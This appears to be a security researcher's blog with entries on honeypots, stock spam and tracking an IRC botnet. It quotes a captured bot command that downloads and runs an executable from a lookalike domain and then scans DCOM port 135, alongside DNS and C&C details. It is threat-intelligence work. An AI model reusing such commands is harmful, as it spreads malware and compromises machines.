honeyblog

Yesterday I arrived in Tokyo for PacSec, I'll teach a Dojo on honeypots next week. The agenda looks pretty interesting, I'm looking forward to the talk on the malware landscape by some Microsoft guys, and the talks on Vista and IPv6.

The web-decoy honeypot, which is designed to collect information related to attacks against web-applications, has now a web frontend and can draw pretty pictures. The figure below is an example of SQL attacks we monitored against one particular honeypot which runs phpMyAdmin.

We should have a web frontend with statistics for everyone in the next couple of weeks.

Perhaps you have seen some stock spam messages in your inbox recently that have one of the topics from the title. Those spam waves belong to some advertizing "campaigns" for CNPM, GAMN, and NSLT (once with GIF images and once with only text in the message body). Pretty interesting to see that stock spam is still around and it seems like the volume is rising. Is that an indication that stock spam is really a lucrative business? If not, the spammers presumably would have stopped those campaigns... Seems like our study on "The Effect of Stock Spam on Financial Markets" was not completely wrong :-)

Vitalsecurity.org has an interesting article entitled "Beware of DoiiarRevenue.com: Mimicking an Adware vendor for fun and profit". Some time ago I also stumbled across this domain while tracking a botnet with the following topic, which is executed by all bots joining the command channel:

:.t kill all |.db http://promo.doIIarrevenue.com/webmasterexe/drsmartload195a.exe 

            c:\drsmartload195a.exe r |.advscan dcom135 100 3 0 -b -r

Instead of the usual promo.dollarrevenue.com link to a drsmartload.exe file, this botnets uses the doiiarrevenue.com site:

$ host dollarrevenue.com
dollarrevenue.com has address 194.187.45.56
dollarrevenue.com mail is handled by 10 MAIL.dollarrevenue.com.

$ host doiiarrevenue.com
doiiarrevenue.com has address 68.142.212.122
doiiarrevenue.com has address 68.142.212.117
doiiarrevenue.com has address 68.142.212.118
doiiarrevenue.com has address 68.142.212.119
doiiarrevenue.com has address 68.142.212.120
doiiarrevenue.com has address 68.142.212.121
doiiarrevenue.com mail is handled by 20 mx1.biz.mail.yahoo.com.
doiiarrevenue.com mail is handled by 30 mx5.biz.mail.yahoo.com.

Via the passive DNS replication service of RUS CERT it is quite obvious that these IPs are also used for other purposes:

The server returned the following data:



xoindustries.ca	 A 	68.142.212.122

norja.cc	 A 	68.142.212.122

prsindia.org	 A 	68.142.212.122

boc.org		 A 	68.142.212.122

iaftd.org	 A 	68.142.212.122

auspiciouscoincidence.org	 A 	68.142.212.122

investforlife.org	 A 	68.142.212.122

missmaine.org	 A 	68.142.212.122

nypdblue.org	 A 	68.142.212.122

rovang.org	 A 	68.142.212.122

artfulexpression.org	 A 	68.142.212.122

fbcindep.org	 A 	68.142.212.122

a-family-affair.org	 A 	68.142.212.122

[...]

So, what is going on here? The only thing I can say currently: doiiarrevenue also hosts a file called vv663.exe which is clearly malicious as the analysis by CWSandbox points out (report in XML format).

We are currently preparing a "live" botnet feed, i.e., when we detect a botnet during the malware analysis with CWSandbox, we send out an e-mail which contains some information about it. A (sanitized) sample report looks like:

file 6908ef042be18d741f943b60eb25bf00.exe, filesize 102400

DNS Lookup

     IP Adress: XXX.125.184.YYY

     Host Name: BAR.FOO.us

C&C Server: XXX.125.184.YYY:6667 (successful)

     Server Password:

     Username: XP-438902

     Nickname: XP-438902

     Channel: #dad

     Channelpassword: pass

This kind of information should help network administrators and perhaps also other security-interested people to protect their network / environment. If you are interested in such a feed, please contact me (thorsten [dot] holz [at] gmail [dot] com).

BTW: the above mentioned botnet is still live after a couple of weeks. Some details about it:

:RE 001 XP-438902 :Welcome to the RE server XP-438902
:RE 002 XP-438902 :Your host is RE, running version 5.5.2453
:RE 003 XP-438902 :This server was created Sep 9 2000 at 01:20:51 PDT
:RE 004 XP-438902 RE 5.5.2453 aioxz abcdefhiklmnoprstuvxyz
:RE 251 XP-438902 :There are 2760 users and 2705 invisible on 1 servers
:RE 252 XP-438902 2 :operator(s) online
:RE 253 XP-438902 4 :unknown connection(s)
:RE 254 XP-438902 17 :channels formed
:RE 255 XP-438902 :I have 2760 clients and 0 servers
:RE 265 XP-438902 :Current local users: 2760 Max: 7967
:RE 266 XP-438902 :Current global users: 2760 Max: 7967
:RE 422 XP-438902 :MOTD File is missing

A blog entry I almost forgot about: a few days ago, Jamie Riden from the New Zealand Honeynet Project published on article on SecurityFocus entitled "Using Nepenthes Honeypots to Detect Common Malware". The article introduces nepenthes and how to install/configure it. The results are interesting:

The New Zealand Honeynet Project installed a Nepenthes honeypot using version 0.17 running on Debian unstable. This was listening on 255 IP addresses, a /24 network prefix. Over a period of five days, it had collected 74 different samples as distinguished by the MD5 hashes of the binaries. Of these, only 48 were identified as malware by a particular antivirus product at the end of the five day period. Of the known samples, many were worms such as Korgo, Doomjuice, Sasser and Mytob. The rest were IRC bots of one sort or another, like SDBot, Spybot, Mybot and Gobot. The majority of binaries, whether classified, as worms or bots had some kind of IRC backdoor functionality. Further analysis of these samples can also be performed by the reader as desired.